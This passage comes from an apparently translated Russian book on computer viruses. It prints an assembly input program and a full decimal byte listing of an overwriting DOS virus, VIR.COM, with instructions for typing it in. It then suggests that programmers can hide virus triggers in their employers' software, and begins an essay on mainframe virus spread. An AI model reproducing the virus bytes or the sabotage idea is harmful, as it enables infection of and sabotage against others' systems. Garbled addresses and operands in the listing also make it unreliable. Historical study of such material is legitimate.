033 086 073 082 046 067 079 077
^Z
Принцип действия программы ввода:
Поскольку NUL не может быть введена с консоли, имя файла
программы должно завершаться OOHEX.
2075:0100 31C0 XOR AX,AX
2075:0102 A24001 MOV 0140 ,AL
Создать и открыть файл
2075:0105 B43C MOV AH,3C
2075:0107 B92020 MOV CX,2020
2075:010A BA3901 MOV DX,0139
2075:010D CD21 INT 21
Обращение к стеку
2075:010F 50 PUSH AX
Считать в цикле 540 байтов без эхо-контроля по консоли и за-
писать в буфер.
2075:0110 BB4102 MOV BX,0241
2075:0113 B8070C MOV AX,0C07
2075:0116 B2FF MOV DL,FF
2075:0118 CD21 INT 21
2075:011A 8807 MOV BX ,AL
2075:011C 43 INC BX
2075:011D 81FB5D04 CMP BX,045D
2075:0121 75FD JNZ 0113
Завершить обработку стека
2075:0123 58 POP AX
- 247 -
Записать содержимое буфера в файл
2075:0124 89C3 MOV BX,AX
2075:0126 B440 MOV AH,40
2075:0128 B91C02 MOV CX,021C
2075:0128 BA4102 MOV DX,0241
2075:012E CD21 INT 21
Закрыть файл
2075:0130 B43E MOV AH,3E
2075:0132 90 NOP
2075:0133 CD21 INT 21
Завершить программу
2075:0435 B44C MOV AH,4C
2075:0137 CD21 INT 21
Имя генерируемого файла стоит перед буфером:
2075:0130 B4 3E 90 CD B4 4C CD-21 56 49 52 2E 43 4F 4D
V I R . C O M
После того, как программа запущена с помощью INP, можно
вводить с клавиатуры все коды ASCII (но без эхо-контроля,
т.е. без отображения вводимых данных на экране). Лишь код NUL
должен вводиться с помощью ALT 2 (с использованием верхних
цифровых клавиш клавиатуры). С помощью такой программы можно
ввести приведенную ниже программу-вирус. Речь здесь идет о
перезаписывающем вирусе из раздела 10.1. Правда, тут есть от-
личия в обращении к дисководу, которые работают безошибочно
лишь при использовании DOS версии 2.11.
После 540 байтов ввод завершается автоматически и прог-
рамма VIR.COM сгенерирована.
144 144 144 184 000 000 038 163
163 002 038 163 165 002 038 162
167 002 180 025 205 033 046 162
250 002 180 071 182 000 004 001
138 208 141 054 252 002 205 033
180 014 178 000 205 033 060 001
- 248 -
117 002 176 006 180 000 141 030
155 002 003 216 131 195 001 046
137 030 163 002 248 115 033 180
023 141 022 176 002 205 033 060
255 117 021 180 044 205 033 046
139 030 163 002 046 138 007 139
218 185 002 000 182 000 205 038
046 139 030 163 002 075 046 137
030 163 002 046 138 023 128 250
255 117 003 233 000 001 180 014
205 033 180 059 141 022 248 002
205 033 235 084 144 180 023 141
022 176 002 205 033 180 059 141
022 248 002 205 033 180 078 185
017 000 141 022 174 002 205 033
114 155 046 139 030 165 002 067
075 116 009 180 079 205 033 114
140 075 117 247 180 047 205 033
131 195 028 038 199 007 032 092
067 030 140 192 142 216 139 211
180 059 205 033 031 046 139 030
165 002 067 046 137 030 165 002
180 078 185 001 000 141 022 168
002 205 033 114 160 235 007 144
180 079 205 033 114 151 180 061
176 002 186 158 000 205 033 139
216 180 063 185 048 002 144 186
000 224 144 205 033 180 062 205
033 046 139 030 000 224 129 251
144 144 116 212 180 067 176 000
186 128 000 205 033 180 067 176
001 129 225 254 000 205 038 180
061 176 002 186 158 000 205 033
139 216 180 087 176 000 205 033
081 082 046 139 022 131 002 046
137 002 048 226 046 139 022 001
224 141 014 130 001 043 209 046
137 022 131 002 180 064 185 048
002 144 141 022 000 001 205 033
- 249 -
180 087 176 001 090 089 205 033
180 062 205 033 046 139 022 048
226 046 137 022 131 002 144 232
007 000 233 000 000 180 000 205
033 180 014 046 138 022 250 002
205 033 180 059 141 022 251 002
205 033 195 255 000 000 000 000
255 000 255 000 000 000 000 000
042 046 099 111 109 000 042 000
255 000 000 000 000 000 063 000
063 063 063 063 063 063 063 063
101 120 101 000 000 000 000 000
063 063 063 063 063 063 063 063
099 111 109 000 255 000 000 000
000 000 063 000 063 063 063 063
063 063 063 063 063 063 063 000
000 000 000 000 063 063 063 063
063 063 063 063 099 111 109 000
092 000 000 092 000 000 000 000
000 000 000 000 000 000 000 000
000 000 000 000 000 000 000 000
000 000 000 000 000 000 000 000
000 000 000 000 000 000 000 026
Тот, кто обладает хорошей памятью, может даже запомнить
эти колонки цифр. Хороший оператор по вводу данных мог бы
ввести вирус с клавиатуры примерно за пять минут.
Еочно также можно работать и через интерфейс СОМ и даже
(с помощью другой вспомогательной программы) через интерфейс
параллельного печатающего устройства.
12.4 Программисты
Эта книга до последнего времени мало уделала внимания
кругу лиц, имеющих наилучшие возможности для доступа к ЭВМ,
т.е. программистам. Для многих организаций-разработчиков
программного обеспечения программы обычно снабжаются блоки-
ровкой по дате, которую можно снять лишь тогда, когда пол-
ностью улажены взаимные расчеты, хотя многие узнают об этом
- 250 -
лишь при изучении настоящей книги. Такие методы, возможно,
нахродятся где-то на грани дозволенных, но если бы точно
знать, чего нельзя делать, когда это делается просто потому,
что не знаешь точно, что и когда следовало бы делать. Итак,
если блокировка по дате вводится тогда, когда не произведены
расчеты, то это не является блокировкой по дате, а скорее
ошибкой в программе, которую каждый раз можно устранить.
Но почему должны программисты поступать не так, как доз-
волено фирмам, производящим программное обеспечение?
В некодированном тексте это может быть определенный зап-
рос, который программист встраивает в программу своего рабо-
тодателя. Так, например, могло бы проверяться существование
файла BURST.$$$. Естественно, такой служащий позаботится о
том, чтобы этот файл постоянно имелся в наличии. Если ему
придется уволиться, его последователь с гарантией обнаружит
на первый взгляд избыточный файл и удалит его. Откуда ему
знать. что этот файл содержит сведения, препятствующие расп-
ространению созданного его предшественником вируса?
Рассуждения такого рода могут завести очень далеко. Еще
одна опасность распространения вирусов возникает при тестиро-
вании программного продукта при его приобретении или при из-
менениях. Если там появляется потенциальный покупатель или
программист, чтобы проверить, будет ли работать его программ-
ное обеспечение на ЭВМ поставщика ХУ, кто бы отказал в такой
просьбе?
13. Степень обеспечения безопасности
Зная пути распространения вирусов, Вы сможете несколько
снизить риск "заражения" системы при соблюдении определенных
мер безопасности. В этой главе описываются ситуации, которым
обычно не придается никакого значения. Однако именно их недо-
оценка может привести к опасным последствиям.
Эти проблемы в средствах защиты изучил Бернд Фикс и сде-
лал ряд рекомендаций, следование которым должно снизить опас-
ность проникновения вирусов в большие ЭВМ. Прежде чем подроб-
нее остановиться на отдельных "рискованных" ситуациях, приве-
дем здесь текст Б.Фикса, который касается проникновения и
распространения вирусов в больших ЭВМ и тоже охватывает два
- 251 -
"сценария распространения инфекции":
"КОМПЬЮТЕРНЫЕ ВИРУСЫ В БОЛЬШИХ ЭВМ
Компьютерные вирусы представляют опасность не только для
персональных ЭВМ - большие ЭВМ в той же степени подвержены
этим "болезням". Поскольку (по крайней мере сегодня) большие
ЭВМ и связывающие их сети данных являются нервной системой
нашего развивающегося информационного общества, внедрение ви-
руса в одну из таких систем могло бы нанести очень большой
ущерб, гораздо больший, чем поражение вирусом одной "изолиро-
ванной" ПЭВМ.
Вообще говоря, вирусы действуют в больших компьютерных
системах по тому же принципу, что и в ПЭВМ. Различие заключа-
ется в основном в организации данных и архитектуре системы на
большой ЭВМ, которые значительно отличаются от структуры дан-
ных и архитектуры ПЭВМ. Потому не будем больше говорить о
функции вирусов вообще, а остановимся на том, как может про-
исходить распространение вирусов в больших ЭВМ в специальных
условиях.
Распространение вируса
Распространение вируса от одной ПЭВМ к другой (а следо-
вательно, от одного пользователя к другому) связано, как пра-
вило, с обменом дискетами. Такой механизм распространения ви-
русов в больших ЭВМ не может существовать или играет лишь
второстепенную роль, поскольку ему препятствует организация
данных в больших ЭВМ:
На одной такой машине работают, как правило, очень много
пользователей (100-1000 пользователей, в зависимости от мощ-
ности ЭВМ). Данные пользователей хранятся, как правило, не на
переносном носителе (за исключением магнитных лент, использу-
емых в качестве резервной копии), а постоянно находятся на
дисках/лентах. Но в результате возникает необходимость отде-
лять данные одного пользхователя от данных другого пользова-
теля, т.е. в принципе каждый пользователь может иметь право
доступа для чтения/записи лишь к собственным данным и право
чтения системных утилит. Итак, собственные данные и части
операционной системы образуют некий замкнутый, изолированный
от других пользователей уровень пользователя. Итак, вирус,
- 252 -
который появился на уровне пользователя, не может распростна-
